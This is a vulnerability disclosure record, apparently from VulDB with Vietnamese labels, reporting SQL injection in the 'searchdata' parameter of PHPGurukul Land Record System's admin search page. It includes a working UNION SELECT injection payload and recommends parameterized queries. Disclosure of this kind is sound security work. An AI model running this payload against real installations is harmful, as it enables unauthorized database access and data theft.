| tiêu đề | PHPGurukul Land Record System 00.0.0.1 SQL Injection |
|---|
| Mô tả | The SQL Injection vulnerability exists in diretory '/landrecordsys/admin/search-property.php' because the 'searchdata' parameters is directly inserted into the SQL queries without any validation or sanitization. If an attacker inputs malicious SQL code as the 'searchdata' parameters, it will be executed by the database. For example, if the 'searchdata' parameter is set to "searchdata=' UNION ALL SELECT NULL,CONCAT(0x716b7a7071,0x42514f586a7575626f4264456748704f796f5667585843617467707265467954684e4a6678784175,0x7176707071),NULL", it could manipulate the query to return or modify unintended data. Always use prepared statements or parameterized queries to prevent this.
script: searchdata=test' UNION ALL SELECT NULL,CONCAT(0x716b7a7071,0x42514f586a7575626f4264456748704f796f5667585843617467707265467954684e4a6678784175,0x7176707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| Nguồn | ⚠️ https://phpgurukul.com/land-record-system-using-php-and-mysql/ |
|---|
| Người dùng | Fergod (UID 55882) |
|---|
| Đệ trình | 30/12/2024 17:32 (cách đây 2 những năm) |
|---|
| Kiểm duyệt | 31/12/2024 09:58 (16 hours later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 289837 [PHPGurukul Land Record System 1.0 search-property.php searchdata Tiêm SQL] |
|---|
| điểm | 20 |
|---|